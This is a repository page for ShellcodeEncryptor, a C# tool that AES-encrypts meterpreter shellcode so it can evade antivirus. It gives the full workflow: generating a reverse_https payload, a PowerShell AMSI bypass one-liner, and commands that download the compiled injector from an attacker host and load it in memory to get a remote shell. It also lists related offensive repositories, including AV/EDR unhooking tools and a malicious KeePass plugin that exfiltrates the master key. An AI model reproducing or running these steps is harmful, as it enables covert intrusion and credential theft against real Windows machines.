• Stars
    star
    462
  • Rank 94,832 (Top 2 %)
  • Language
    C#
  • Created about 4 years ago
  • Updated almost 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A simple shell code encryptor/decryptor/executor to bypass anti virus.

ShellcodeEncryptor

A simple shell code encryptor/decryptor/executor to bypass anti virus.

Note: I have completely redone the work flow for creating the bypass, I have found injecting the binary into memory using PowerShell as the most effective method.

Demo

Purpose

To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus.

Instructions

Use the meterpreter_encryptor.py to create the encrypted base64 shellcode:

root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.1.228 -l 443 -f b64
[+] Generating MSFVENOM payload...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 667 (iteration=0)
x64/xor_dynamic chosen with final size 667
Payload size: 667 bytes
Saved as: ./msf.bin
[+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...
[+] Base64 output:
sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg

Take the key and shellcode and insert it into ProcessInjector.cs

// decrypt the base64 payload
string payload = "sZkMii [etc...]";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server.

Inject the executable into a remote PowerShell process:

# AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)

$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

Hopefully you will have a nice meterpreter shell.

Help

./meterpreter_encryptor.py -h                                                                     
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]

optional arguments:
  -h, --help            show this help message and exit
  -l LPORT, --lport LPORT
                        The local port that msfconsole is listening on.
  -i LHOST, --lhost LHOST
                        The local host that msfconsole is listening on.
  -p PAYLOAD, --payload PAYLOAD
                        The payload to generate in msfvenom.
  -m METHOD, --method METHOD
                        The method to use: thread/delegate.
  -k KEY, --key KEY     The encryption key (32 chars).
  -e ENCODER, --encoder ENCODER
                        The meterpreter encoder.
  -f FORMAT, --format FORMAT
                        The format to output.

AV Scan Results

The binary was scanned using antiscan.me on 03/10/2021.

AV Scan

Notes

Tested with windows/x64/meterpreter/reverse_https on Windows 10 Pro (build 10.0.19042) with Defender.

More Repositories

1

Shellcode-Injection-Techniques

A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV.
C#
439
star
2

Suspended-Thread-Injection

Another meterpreter injection technique using C# that attempts to bypass Defender
C#
248
star
3

SandboxDefender

C# code to Sandbox Defender (and most probably other AV/EDRs).
C#
163
star
4

Peruns-Fart

Perun's Fart (Slavic God's Luck). Another method for unhooking AV and EDR, this is my C# version.
C#
105
star
5

CmdLineSpoofer

How to spoof the command line when spawning a new process from C#.
C#
96
star
6

Sys-Calls

An example of using Syscalls in C# to get a meterpreter shell.
C#
95
star
7

Unhook-BitDefender

Unhooks Bit Defender from NTDLL and KERNELBASE using a classic technique.
C#
50
star
8

AMSI-Bypass

Another AMSI bypass - but in C++.
C++
24
star
9

ps-encoder

A very simple python script to encode and decode PowerShell one-liners.
Python
21
star
10

PowerGhost

A custom run space to bypass AMSI and Constrained Language mode in PowerShell.
C#
19
star
11

Malicious-KeePass-Plugin

A malicious KeePass plugin to exfiltrate the master key.
C#
15
star
12

DynamicEarlyBird

An example of using Dynamic Invoke to Inject Shellcode using the Early Bird Method.
C#
11
star
13

impersonator

C++ code to impersonate a Windows token and spawn a new process.
C++
5
star
14

misc-scripts

Miscellaneous Scripts
Python
5
star
15

Enumeration

Some .Net assemblies used to enumerate a host. Best when they are loaded in to memory.
C#
4
star
16

plackyhacker.github.io

Python
3
star
17

msgbox

Host a non-malicious shellcode
PowerShell
3
star
18

HEVD

My exploits for the HackSys Vulnerable Driver Project
C++
2
star
19

passwordgenerator

Generate three random word password lists quickly
Python
2
star
20

SecureCode1

Python exploit for the VulnHub OSWE practice box 'SecureCode1'
Python
2
star
21

marra

Marra
PowerShell
1
star
22

Sliver-Extension-Template

A Sliver Extension Template
C++
1
star